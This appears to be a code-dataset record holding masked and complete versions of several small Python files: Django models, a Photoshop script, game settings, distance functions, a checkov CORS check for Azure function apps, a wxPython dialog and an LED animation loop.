"step-4": "<mask token>\n\n\nclass FatherMenu(models.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n verbose_name = u'一级菜单'\n verbose_name_plural = u'一级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass SonMenu(models.Model):\n title = models.CharField(u'菜单名', max_length=20)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n father = models.ForeignKey('seclab.FatherMenu', blank=True, null=True,\n verbose_name=u'父菜单')\n\n\n class Meta:\n verbose_name = u'二级菜单'\n verbose_name_plural = u'二级菜单'\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n tagId = models.IntegerField(u'序号')\n intro = models.CharField(u'描述', max_length=100)\n title = models.CharField(u'标题', max_length=100)\n slug = models.CharField(u'链接', max_length=100, db_index=True)\n\n\n class Meta:\n verbose_name = u'图片'\n verbose_name_plural = u'图片'\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u'类型', max_length=20)\n title = models.CharField(u'标题', max_length=100)\n content = models.TextField(u'内容', default=u'', blank=True)\n author = models.CharField(u'作者', max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u'首页显示', default=False)\n\n\n class Meta:\n verbose_name = u'文章'\n verbose_name_plural = u'文章'\n\n def __unicode__(self):\n return self.title\n",
"step-5": "# _*_ coding:utf-8 _*_\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.core.urlresolvers import reverse \n# Create your models here.\n\n\n# 本文件中,用__unicode__代替了__str__,以免在admin界面中显示中文而引发错误。\n# 参考:http://blog.csdn.net/jiangnanandi/article/details/3574007\n# 或者另一个解决方案:http://blog.sina.com.cn/s/blog_63cf1c510101an74.html\n\n\nclass FatherMenu(models.Model):\n\n title = models.CharField(u\"菜单名\", max_length=20)\n slug = models.CharField(u\"链接\", max_length=100, db_index=True)\n son = models.BooleanField(\"子菜单?\", default=False)\n\n class Meta:\n verbose_name = u\"一级菜单\"\n verbose_name_plural = u\"一级菜单\"\n\n def __unicode__(self):\n return self.title\n\n\nclass SonMenu(models.Model):\n\n title = models.CharField(u\"菜单名\", max_length=20)\n slug = models.CharField(u\"链接\", max_length=100, db_index=True)\n father = models.ForeignKey(\n 'seclab.FatherMenu', blank=True, null=True, verbose_name=u\"父菜单\")\n\n class Meta:\n verbose_name = u\"二级菜单\"\n verbose_name_plural = u\"二级菜单\"\n\n def __unicode__(self):\n return self.title\n\n\nclass Img(models.Model):\n tag = models.CharField(u\"类型\", max_length=20)\n tagId = models.IntegerField(u\"序号\")\n intro = models.CharField(u\"描述\", max_length=100)\n title = models.CharField(u\"标题\", max_length=100)\n slug = models.CharField(u\"链接\", max_length=100, db_index=True)\n\n class Meta:\n verbose_name = u\"图片\"\n verbose_name_plural = u\"图片\"\n\n def __unicode__(self):\n return self.slug\n\n\nclass Article(models.Model):\n tag = models.CharField(u\"类型\", max_length=20)\n title = models.CharField(u\"标题\", max_length=100)\n content = models.TextField(u\"内容\", default=u'', blank=True)\n author = models.CharField(u\"作者\", max_length=100)\n pub_date = models.DateField(u'发表日期', auto_now_add=True, editable=True)\n home_display = models.BooleanField(u\"首页显示\", default=False)\n\n class Meta:\n verbose_name = u\"文章\"\n verbose_name_plural = u\"文章\"\n\n def __unicode__(self):\n return self.title\n",
"step-ids": [
7,
8,
10,
11,
14
]
}
|
[
7,
8,
10,
11,
14
] |
"""Toggle the proof color.
Like operating in the menu:
**View** > **Proof Colors** (Ctrl + Y)
"""
# Import local modules
from photoshop import Session
with Session() as ps:
ps.app.runMenuItem(ps.app.stringIDToTypeID("toggleProofColors"))
|
normal
|
{
"blob_id": "1db866ca73bc264d474d5e5086c4a047d7e46546",
"index": 2299,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith Session() as ps:\n ps.app.runMenuItem(ps.app.stringIDToTypeID('toggleProofColors'))\n",
"step-3": "<mask token>\nfrom photoshop import Session\nwith Session() as ps:\n ps.app.runMenuItem(ps.app.stringIDToTypeID('toggleProofColors'))\n",
"step-4": "\"\"\"Toggle the proof color.\n\nLike operating in the menu:\n**View** > **Proof Colors** (Ctrl + Y)\n\n\"\"\"\n# Import local modules\nfrom photoshop import Session\n\n\nwith Session() as ps:\n ps.app.runMenuItem(ps.app.stringIDToTypeID(\"toggleProofColors\"))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Main Parameters
# Asset locations, relative to the working directory.
FONTS_PATH = "media/battle_font.ttf"
LEVELS_PATH = "media/levels"
GAME_MUSIC_PATH = "media/sounds/DOOM.ogg"
MENU_MUSIC_PATH = "media/sounds/ANewMorning.ogg"

# GAME Parameters
FONT_SIZE = 30
# One grid cell: a 13 px base tile at 2x scale — TODO confirm tile size.
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)
FPS = 30
# The playing field is a 30 x 30 grid of cells.
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
# Respawn delay — presumably measured in frames; verify against the game loop.
RESPAWN_TIME = 64
|
normal
|
{
"blob_id": "513d7e3c34cc9da030e2e018ad2db6972cf440dc",
"index": 5100,
"step-1": "<mask token>\n",
"step-2": "FONTS_PATH = 'media/battle_font.ttf'\nLEVELS_PATH = 'media/levels'\nGAME_MUSIC_PATH = 'media/sounds/DOOM.ogg'\nMENU_MUSIC_PATH = 'media/sounds/ANewMorning.ogg'\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = CELL_WIDTH, CELL_HEIGHT\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = DISPLAY_WIDTH, DISPLAY_HEIGHT\nRESPAWN_TIME = 64\n",
"step-3": "# Main Parameters\nFONTS_PATH = \"media/battle_font.ttf\"\nLEVELS_PATH = \"media/levels\"\nGAME_MUSIC_PATH = \"media/sounds/DOOM.ogg\"\nMENU_MUSIC_PATH = \"media/sounds/ANewMorning.ogg\"\n\n# GAME Parameters\nFONT_SIZE = 30\nCELL_WIDTH = 13 * 2\nCELL_HEIGHT = 13 * 2\nCELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)\nFPS = 30\nDISPLAY_WIDTH = CELL_WIDTH * 30\nDISPLAY_HEIGHT = CELL_HEIGHT * 30\nDISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)\nRESPAWN_TIME = 64\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def calculaEuclidiana(obj1, obj2):
    """Euclidean distance between two indexable vectors of equal length.

    Iterates over the indices of ``obj1``, so ``obj2`` must expose at
    least the same indices.
    """
    quadrados = sum((obj1[i] - obj2[i]) ** 2 for i in range(len(obj1)))
    return quadrados ** 0.5
def calculaMinkowski(obj1, obj2, p):
    """Minkowski distance of order ``p``.

    p = 2 gives the Euclidean distance; p = 1 gives the Manhattan distance.
    """
    acumulado = sum(abs(obj1[i] - obj2[i]) ** p for i in range(len(obj1)))
    return acumulado ** (1 / p)
def delta(obj1, obj2):
    """Presence indicator: 1 when both values exist, 0 when either is missing.

    A missing value is represented either by ``None`` itself or by the
    string ``'None'`` (as produced by some CSV/text loaders).
    """
    # Fix: use identity comparison for None (PEP 8 E711) instead of `== None`.
    if obj1 is None or obj2 is None or obj1 == 'None' or obj2 == 'None':
        return 0
    return 1
def calculaMinkowskiNormalizada(obj1, obj2, p):
    """Minkowski distance over the dimensions present in BOTH vectors,
    normalised by the number of such dimensions.

    A value is "missing" when it is None or the string 'None'.

    Bug fix: the original accumulated ``abs(obj1[i] - obj2[i]) ** p``
    unconditionally, so any missing (None) value raised a TypeError even
    though the delta counter was meant to skip it. Missing dimensions are
    now excluded from both the sum and the normaliser.

    Raises ZeroDivisionError when no dimension is present in both vectors
    (unchanged from the original's behaviour when somaDelta stayed 0).
    """

    def _presente(valor):
        # Mirrors delta(): None or the string 'None' marks a missing value.
        return valor is not None and valor != 'None'

    soma = 0
    somaDelta = 0
    for i in range(len(obj1)):
        if _presente(obj1[i]) and _presente(obj2[i]):
            somaDelta += 1
            soma += abs(obj1[i] - obj2[i]) ** p
    return soma ** (1 / p) / somaDelta
# def calculaMahalanobis()

# Sample vectors for manual experiments; index 2 of obj1 is deliberately
# missing (None) to exercise the normalised distance.
obj1 = {0: 2, 1: -1, 2: None, 3: 0}

# print("len ", obj1[2])

obj2 = {0: 7, 1: 0, 2: -4, 3: 8}

# print("Result Euclidiana = ", calculaEuclidiana(obj1, obj2))
# print("Result Minkowski = ", calculaMinkowski(obj1, obj2, 2))
# print("Result Minkowski normalizada = ", calculaMinkowskiNormalizada(obj1, obj2, 2))
|
normal
|
{
"blob_id": "6c349b7b4d82b37ec1b1ff8e0d35a3557ed1af67",
"index": 4613,
"step-1": "<mask token>\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\n<mask token>\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\ndef delta(obj1, obj2):\n if (obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None'):\n return 0\n else:\n return 1\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\n<mask token>\n",
"step-3": "def calculaEuclidiana(obj1, obj2):\n soma = 0\n for I in range(len(obj1)):\n soma += (obj1[I] - obj2[I]) ** 2\n return soma ** 0.5\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\ndef delta(obj1, obj2):\n if (obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None'):\n return 0\n else:\n return 1\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\n<mask token>\n",
"step-4": "def calculaEuclidiana(obj1, obj2):\n soma = 0\n for I in range(len(obj1)):\n soma += (obj1[I] - obj2[I]) ** 2\n return soma ** 0.5\n\n\ndef calculaMinkowski(obj1, obj2, p):\n soma = 0\n for I in range(len(obj1)):\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p)\n\n\ndef delta(obj1, obj2):\n if (obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None'):\n return 0\n else:\n return 1\n\n\ndef calculaMinkowskiNormalizada(obj1, obj2, p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if delta(obj1[I], obj2[I]):\n somaDelta += 1\n soma += abs(obj1[I] - obj2[I]) ** p\n return soma ** (1 / p) / somaDelta\n\n\nobj1 = {}\nobj1[0] = 2\nobj1[1] = -1\nobj1[2] = None\nobj1[3] = 0\nobj2 = {}\nobj2[0] = 7\nobj2[1] = 0\nobj2[2] = -4\nobj2[3] = 8\n",
"step-5": "def calculaEuclidiana(obj1,obj2):\n soma = 0\n for I in range(len(obj1)):\n soma += (obj1[I] - obj2[I])**2\n return soma ** 0.5\n\ndef calculaMinkowski(obj1,obj2,p):\n # p = 2 => distancia Euclidiana\n # p = 1 => distancia de Manhattan\n soma = 0\n for I in range(len(obj1)):\n soma += (abs(obj1[I] - obj2[I]))**p\n return soma ** (1/p) \n\ndef delta(obj1,obj2):\n if((obj1 == None or obj2 == None) or (obj1 == 'None' or obj2 == 'None')):\n return 0\n else:\n return 1\n\ndef calculaMinkowskiNormalizada(obj1,obj2,p):\n soma = 0\n somaDelta = 0\n for I in range(len(obj1)):\n if(delta(obj1[I],obj2[I])):\n somaDelta+=1\n soma += (abs(obj1[I] - obj2[I])) ** p\n return (soma ** (1/p))/somaDelta\n\n# def calculaMahalanobis()\n\nobj1 = {}\nobj1[0] = 2\nobj1[1] = -1\nobj1[2] = None\nobj1[3] = 0\n\n# print(\"len \",obj1[2])\n\nobj2 = {}\nobj2[0] = 7\nobj2[1] = 0\nobj2[2] = -4\nobj2[3] = 8\n\n# print(\"Result Euclidiana = \",calculaEuclidiana(obj1,obj2))\n\n# print(\"Result Minkowski = \", calculaMinkowski(obj1,obj2,2))\n\n# print(\"Result Minkowski normalizada = \", calculaMinkowskiNormalizada(obj1,obj2,2))",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
missing_attribute_result=CheckResult.PASSED)
<|reserved_special_token_0|>
def get_forbidden_values(self):
return [['*']]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
missing_attribute_result=CheckResult.PASSED)
def get_inspected_key(self):
return 'site_config/[0]/cors/[0]/allowed_origins'
def get_forbidden_values(self):
return [['*']]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
missing_attribute_result=CheckResult.PASSED)
def get_inspected_key(self):
return 'site_config/[0]/cors/[0]/allowed_origins'
def get_forbidden_values(self):
return [['*']]
check = FunctionAppDisallowCORS()
<|reserved_special_token_1|>
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
def __init__(self):
name = 'Ensure function apps are not accessible from all regions'
id = 'CKV_AZURE_62'
supported_resources = ['azurerm_function_app']
categories = [CheckCategories.GENERAL_SECURITY]
super().__init__(name=name, id=id, categories=categories,
supported_resources=supported_resources,
missing_attribute_result=CheckResult.PASSED)
def get_inspected_key(self):
return 'site_config/[0]/cors/[0]/allowed_origins'
def get_forbidden_values(self):
return [['*']]
check = FunctionAppDisallowCORS()
<|reserved_special_token_1|>
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck
class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):
    """Checkov check CKV_AZURE_62 for azurerm_function_app resources.

    Fails when the function app's CORS configuration allows every origin
    ('*'); when the attribute is absent the check passes
    (missing_attribute_result=PASSED).
    """

    def __init__(self):
        # NOTE(review): the display name talks about "regions" but the check
        # actually inspects CORS allowed origins — the wording may be stale;
        # confirm before renaming (the string is user-visible check metadata).
        name = "Ensure function apps are not accessible from all regions"
        id = "CKV_AZURE_62"
        supported_resources = ['azurerm_function_app']
        categories = [CheckCategories.GENERAL_SECURITY]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, missing_attribute_result=CheckResult.PASSED)

    def get_inspected_key(self):
        # Path into the Terraform resource: site_config { cors { allowed_origins } }
        return 'site_config/[0]/cors/[0]/allowed_origins'

    def get_forbidden_values(self):
        # A list containing exactly '*' means "allow all origins".
        return [['*']]


# Module-level instance: checkov discovers checks by importing the module.
check = FunctionAppDisallowCORS()
|
flexible
|
{
"blob_id": "30c2d46d6587df3cbc3e83ecb7af787fcd86eb1f",
"index": 7067,
"step-1": "<mask token>\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n <mask token>\n\n def get_forbidden_values(self):\n return [['*']]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\ncheck = FunctionAppDisallowCORS()\n",
"step-4": "from checkov.common.models.enums import CheckCategories, CheckResult\nfrom checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n\n def __init__(self):\n name = 'Ensure function apps are not accessible from all regions'\n id = 'CKV_AZURE_62'\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories,\n supported_resources=supported_resources,\n missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\ncheck = FunctionAppDisallowCORS()\n",
"step-5": "from checkov.common.models.enums import CheckCategories, CheckResult\nfrom checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck\n\n\nclass FunctionAppDisallowCORS(BaseResourceNegativeValueCheck):\n def __init__(self):\n name = \"Ensure function apps are not accessible from all regions\"\n id = \"CKV_AZURE_62\"\n supported_resources = ['azurerm_function_app']\n categories = [CheckCategories.GENERAL_SECURITY]\n super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, missing_attribute_result=CheckResult.PASSED)\n\n def get_inspected_key(self):\n return 'site_config/[0]/cors/[0]/allowed_origins'\n\n def get_forbidden_values(self):\n return [['*']]\n\n\ncheck = FunctionAppDisallowCORS()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
class Circle():
    """A circle defined by its radius and a fill color (white by default)."""

    def __init__(self, radius, color="white"):
        # Store both constructor arguments as plain public attributes.
        self.radius, self.color = radius, color


c1 = Circle(10, "black")
message = "半径:{}, 色: {}".format(c1.radius, c1.color)
print(message)
|
normal
|
{
"blob_id": "6ce50552571594c7be77ac0bf3b5274f2f39e545",
"index": 5086,
"step-1": "class Circle:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Circle:\n\n def __init__(self, radius, color='white'):\n self.radius = radius\n self.color = color\n\n\n<mask token>\n",
"step-3": "class Circle:\n\n def __init__(self, radius, color='white'):\n self.radius = radius\n self.color = color\n\n\n<mask token>\nprint('半径:{}, 色: {}'.format(c1.radius, c1.color))\n",
"step-4": "class Circle:\n\n def __init__(self, radius, color='white'):\n self.radius = radius\n self.color = color\n\n\nc1 = Circle(10, 'black')\nprint('半径:{}, 色: {}'.format(c1.radius, c1.color))\n",
"step-5": "class Circle():\n def __init__(self, radius, color=\"white\"):\n self.radius = radius\n self.color = color\n \nc1 = Circle(10, \"black\")\nprint(\"半径:{}, 色: {}\".format(c1.radius, c1.color))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# staticbox.py
import wx
class StaticBox(wx.Dialog):
    """Modal dialog demonstrating wx.StaticBox grouping of form widgets.

    The dialog centers, shows itself modally, and destroys itself all from
    __init__, so constructing the object runs the entire interaction.
    """

    def __init__(self, parent, id, title):
        wx.Dialog.__init__(self, parent, id, title, size = (250, 230))

        # NOTE: the StaticBox is created before the controls it visually
        # groups — wx convention for correct layering; confirm if reordering.
        wx.StaticBox(self, -1, 'Personal Info', (5, 5), size = (240, 170))
        wx.CheckBox(self, -1, 'Male', (15, 30))
        wx.CheckBox(self, -1, 'Married', (15, 55))
        wx.StaticText(self, -1, 'Age', (15, 95))
        wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min = 1, max = 120)
        wx.Button(self, 1, 'Ok', (90, 185), (60, -1))

        # Button id 1 (the Ok button above) dispatches to OnClose.
        self.Bind(wx.EVT_BUTTON, self.OnClose, id = 1)

        self.Center()
        self.ShowModal()
        self.Destroy()

    def OnClose(self, event):
        # Dismiss the modal dialog; __init__ then destroys the window.
        self.Close()
if __name__ == '__main__':
    # Script entry point: the dialog runs modally inside its constructor,
    # so MainLoop only services whatever remains afterwards.
    app = wx.App()
    StaticBox(None, -1, 'staticbox.py')
    app.MainLoop()
|
normal
|
{
"blob_id": "96bf6220bfc884e3a19f70a63d9ecba449e2e7e2",
"index": 6108,
"step-1": "<mask token>\n\n\nclass StaticBox(wx.Dialog):\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass StaticBox(wx.Dialog):\n\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size=(250, 230))\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size=(240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min=1, max=120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n self.Bind(wx.EVT_BUTTON, self.OnClose, id=1)\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass StaticBox(wx.Dialog):\n\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size=(250, 230))\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size=(240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min=1, max=120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n self.Bind(wx.EVT_BUTTON, self.OnClose, id=1)\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\n\nif __name__ == '__main__':\n app = wx.App()\n StaticBox(None, -1, 'staticbox.py')\n app.MainLoop()\n",
"step-4": "import wx\n\n\nclass StaticBox(wx.Dialog):\n\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size=(250, 230))\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size=(240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min=1, max=120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n self.Bind(wx.EVT_BUTTON, self.OnClose, id=1)\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\n\nif __name__ == '__main__':\n app = wx.App()\n StaticBox(None, -1, 'staticbox.py')\n app.MainLoop()\n",
"step-5": "#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n\n# staticbox.py\n\nimport wx\n\nclass StaticBox(wx.Dialog):\n def __init__(self, parent, id, title):\n wx.Dialog.__init__(self, parent, id, title, size = (250, 230))\n\n wx.StaticBox(self, -1, 'Personal Info', (5, 5), size = (240, 170))\n wx.CheckBox(self, -1, 'Male', (15, 30))\n wx.CheckBox(self, -1, 'Married', (15, 55))\n wx.StaticText(self, -1, 'Age', (15, 95))\n wx.SpinCtrl(self, -1, '1', (55, 90), (60, -1), min = 1, max = 120)\n wx.Button(self, 1, 'Ok', (90, 185), (60, -1))\n\n self.Bind(wx.EVT_BUTTON, self.OnClose, id = 1)\n\n self.Center()\n self.ShowModal()\n self.Destroy()\n\n def OnClose(self, event):\n self.Close()\n\nif __name__ == '__main__':\n app = wx.App()\n StaticBox(None, -1, 'staticbox.py')\n app.MainLoop()\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def animationDisplay():
matrix.Clear()
sonicRun = 0
sonicFrame = 0
y = 0
while y < 70:
sonicFrame = 0
if sonicRun >= 100:
sonicRun = 0
y = y + 15
while sonicFrame < 8:
animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
imageDisplay(animationFrame, sonicRun, y)
time.sleep(0.05)
sonicRun = sonicRun + 6
sonicFrame = sonicFrame + 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from runImages import *
def animationDisplay():
matrix.Clear()
sonicRun = 0
sonicFrame = 0
y = 0
while y < 70:
sonicFrame = 0
if sonicRun >= 100:
sonicRun = 0
y = y + 15
while sonicFrame < 8:
animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
imageDisplay(animationFrame, sonicRun, y)
time.sleep(0.05)
sonicRun = sonicRun + 6
sonicFrame = sonicFrame + 1
<|reserved_special_token_1|>
"""
This is the hourly animation program. It displays a series of images across the board.
It is hard coded to work with the Sonic images. Adjustments would need to be made to
the y values which are distance traveled. Change sonicFrame < 8 value to the total
number of frames the new animation has.
"""
from runImages import *
def animationDisplay():
matrix.Clear()
sonicRun = 0
sonicFrame = 0
y = 0
while y < 70:
sonicFrame = 0
if sonicRun >= 100:
sonicRun = 0
y = y + 15
while sonicFrame < 8:
animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
imageDisplay(animationFrame, sonicRun, y)
time.sleep(0.05)
sonicRun = sonicRun + 6
sonicFrame = sonicFrame + 1
|
flexible
|
{
"blob_id": "ede675c971ed233e93c14aa4d2ffb66fe7ba775a",
"index": 5613,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef animationDisplay():\n matrix.Clear()\n sonicRun = 0\n sonicFrame = 0\n y = 0\n while y < 70:\n sonicFrame = 0\n if sonicRun >= 100:\n sonicRun = 0\n y = y + 15\n while sonicFrame < 8:\n animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'\n imageDisplay(animationFrame, sonicRun, y)\n time.sleep(0.05)\n sonicRun = sonicRun + 6\n sonicFrame = sonicFrame + 1\n",
"step-3": "<mask token>\nfrom runImages import *\n\n\ndef animationDisplay():\n matrix.Clear()\n sonicRun = 0\n sonicFrame = 0\n y = 0\n while y < 70:\n sonicFrame = 0\n if sonicRun >= 100:\n sonicRun = 0\n y = y + 15\n while sonicFrame < 8:\n animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'\n imageDisplay(animationFrame, sonicRun, y)\n time.sleep(0.05)\n sonicRun = sonicRun + 6\n sonicFrame = sonicFrame + 1\n",
"step-4": "\"\"\"\nThis is the hourly animation program. It displays a series of images across the board.\nIt is hard coded to work with the Sonic images. Adjustments would need to be made to\nthe y values which are distance traveled. Change sonicFrame < 8 value to the total\nnumber of frames the new animation has.\n\"\"\"\nfrom runImages import *\n\ndef animationDisplay():\n matrix.Clear()\n sonicRun = 0\n sonicFrame = 0\n y = 0\n while y < 70:\n sonicFrame = 0\n if sonicRun >= 100:\n sonicRun = 0\n y = y + 15\n while sonicFrame < 8:\n animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'\n imageDisplay(animationFrame, sonicRun, y)\n time.sleep(0.05)\n sonicRun = sonicRun + 6\n sonicFrame = sonicFrame + 1\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
